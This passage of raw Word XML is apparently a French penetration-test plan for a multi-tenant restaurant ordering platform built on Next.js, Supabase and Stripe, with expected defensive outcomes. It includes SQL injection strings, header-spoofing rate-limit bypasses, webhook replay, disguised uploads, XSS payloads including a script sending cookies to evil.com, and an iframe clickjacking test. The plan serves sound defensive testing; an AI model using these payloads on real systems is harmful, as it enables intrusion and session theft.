        </w:rPr>
        <w:t xml:space="preserve">3. Tenter via le champ de recherche d'items si disponible</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Tenter via les parametres de l'URL : /sites/tenant-a%27%3BDROP%20TABLE/menu</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Tenter via le body JSON des commandes : item_id = "1; DELETE FROM menu_items"</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 SDK Supabase utilise des requetes parametrees. L'injection est impossible. Erreur 400 ou 404.</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src/lib/supabase/server.ts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">- src/app/api/orders/route.ts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SC-05 : Vol du Service Role Key</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Severite : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="CC0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">CRITIQUE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Verifier que la cle service_role n'est JAMAIS exposee cote client.</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Ouvrir les DevTools &gt; Network sur n'importe quelle page</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Rechercher "service_role" ou "SUPABASE_SERVICE_ROLE_KEY" dans les headers, responses, et cookies</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Inspecter le code source JS bundle (View Source) pour chercher la cle</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Verifier que le fichier .env.local n'est pas servi par Next.js</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Scanner les headers de reponse pour des fuites d'info serveur</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La cle service_role ne doit apparaitre NULLE PART cote client. Seule NEXT_PUBLIC_SUPABASE_ANON_KEY est visible.</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src/lib/supabase/admin.ts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">- src/lib/supabase/client.ts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">- .env.local</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Scenarios HAUTE severite</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SC-06 : Bypass Rate Limiting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Severite : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E65100"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">HAUTE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Un attaquant tente de contourner le rate limiting pour faire du brute force.</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Envoyer 100 requetes POST /api/signup en boucle depuis la meme IP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Si bloque : changer le header x-forwarded-for a chaque requete (IP spoofing)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Si bloque : utiliser x-real-ip avec des IPs differentes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Tenter depuis un VPN avec des IPs tournantes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Tester quand UPSTASH_REDIS_REST_URL n'est pas configure (le rate limiting se desactive)</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Les requetes sont bloquees apres le seuil (5 signups / 10 min). Le spoofing d'IP via headers ne doit PAS contourner le limiteur si le reverse proxy (Vercel) gere correctement les headers.</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src/lib/rate-limit.ts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">- Vercel config</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SC-07 : Stripe Webhook Replay Attack</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Severite : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E65100"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">HAUTE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Un attaquant rejoue un webhook Stripe pour crediter un abonnement sans paiement.</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Capturer un webhook Stripe valide (checkout.session.completed)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Rejouer exactement le meme payload 10 minutes plus tard</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Modifier le payload (ex: changer le plan) et renvoyer avec la meme signature</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Envoyer un webhook avec une signature invalide</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Envoyer un webhook sans le header stripe-signature</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 webhook rejoue est rejete (idempotence). Le webhook modifie est rejete (signature invalide). Sans signature, erreur 400.</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src/app/api/webhooks/stripe/route.ts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SC-08 : Upload de fichier malveillant</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Severite : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E65100"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">HAUTE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Un attaquant uploade un fichier executable deguise en image.</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Preparer un fichier malware.exe renomme en photo.png</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Modifier le Content-Type a "image/png" dans la requete</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Envoyer via POST /api/upload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Tenter avec un SVG contenant du JavaScript (&lt;script&gt;alert(1)&lt;/script&gt;)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Tenter avec un fichier .html renomme en .jpg</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">6. Tenter un fichier de 50MB (depassement de la limite 5MB)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">7. Tenter avec un bucket non-whitelist (ex: bucket = "private-data")</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 serveur valide le MIME type reel (pas seulement l'extension). Les SVG et HTML sont rejetes. Le bucket whitelist bloque les buckets non-autorises. La limite de taille est respectee.</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src/app/api/upload/route.ts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SC-09 : XSS via contenu de menu</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Severite : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E65100"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">HAUTE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Un admin injecte du JavaScript dans le nom/description d'un plat, visible par les clients.</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Se connecter comme admin d'un tenant</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Creer un item de menu avec le nom : &lt;script&gt;document.location="https://evil.com?c="+document.cookie&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Creer un item avec la description : &lt;img src=x onerror=alert(1)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Verifier si le script s'execute quand un client consulte le menu QR</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Tenter aussi dans les noms de categories, les notes de commande, les noms de tables</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React echappe automatiquement le contenu rendu. Le script s'affiche comme texte brut, il ne s'execute pas. Verifier qu'aucun dangerouslySetInnerHTML n'est utilise avec du contenu dynamique.</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src/components/tenant/ (tous les composants menu)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">- src/app/sites/[site]/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SC-10 : Clickjacking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Severite : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E65100"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">HAUTE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Un attaquant embarque le dashboard ATTABL dans une iframe sur un site malveillant.</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Creer une page HTML avec : &lt;iframe src="https://tenant.attabl.com/admin"&gt;&lt;/iframe&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Ouvrir cette page dans un navigateur</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Verifier si le dashboard s'affiche dans l'iframe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Tenter aussi avec X-Frame-Options: SAMEORIGIN au lieu de DENY</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L'iframe est bloquee. X-Frame-Options: DENY empeche tout embedding. Le dashboard ne s'affiche pas.</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next.config.mjs (security headers)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Scenarios MOYENNE severite</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SC-11 : Enumeration de tenants</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Severite : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="CC7700"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">MOYENNE</w:t>
      </w:r>
    </w:p>
    <w:p>
